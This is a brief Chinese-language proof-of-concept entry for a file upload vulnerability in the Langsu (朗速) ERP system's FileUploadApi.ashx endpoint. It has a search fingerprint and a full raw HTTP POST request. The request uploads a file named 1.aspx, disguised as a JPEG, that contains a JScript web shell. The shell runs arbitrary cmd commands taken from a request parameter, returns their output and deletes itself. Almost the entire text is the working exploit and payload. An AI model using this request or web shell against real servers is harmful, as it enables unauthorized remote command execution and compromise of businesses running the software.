朗速ERP系统FileUploadApi.ashx存在文件上传漏洞 body = "/Resource/Scripts/Yw/Yw_Bootstrap.js" POST / Api / FileUploadApi . ashx ?method = DoWebUpload HTTP / 1.1
Host :
User - Agent : Mozilla / 5.0 ( Macintosh ; Intel Mac OS X 10_15_7 ) AppleWebKit / 537.36 ( KHTML , like Gecko ) Chrome / 107.0 .0 .0 Safari / 537.36
Accept - Encoding : gzip , deflate
Content - Type : multipart / form - data ; boundary = -- -- WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept : * / *
Connection : close
-- -- -- WebKitFormBoundaryFfJZ4PlAZBixjELj
Content - Disposition : form - data ; name = "file" ; filename = "1.aspx"
Content - Type : image / jpeg
< % @ Page Language = "Jscript" validateRequest = "false" % >
< %
var c = new System . Diagnostics . ProcessStartInfo ( "cmd" ) ;
var e = new System . Diagnostics . Process ( ) ;
var out :System . IO . StreamReader , EI :System . IO . StreamReader ;
c . UseShellExecute = false ;
c . RedirectStandardOutput = true ;
c . RedirectStandardError = true ;
e . StartInfo = c ;
c . Arguments = "/c " + Request . Item [ "cmd" ] ;
e . Start ( ) ;
out = e . StandardOutput ;
EI = e . StandardError ;
e . Close ( ) ;
Response . Write ( out . ReadToEnd ( ) + EI . ReadToEnd ( ) ) ;
System . IO . File . Delete ( Request . PhysicalPath ) ;
Response . End ( ) ; % >
-- -- -- WebKitFormBoundaryFfJZ4PlAZBixjELj --
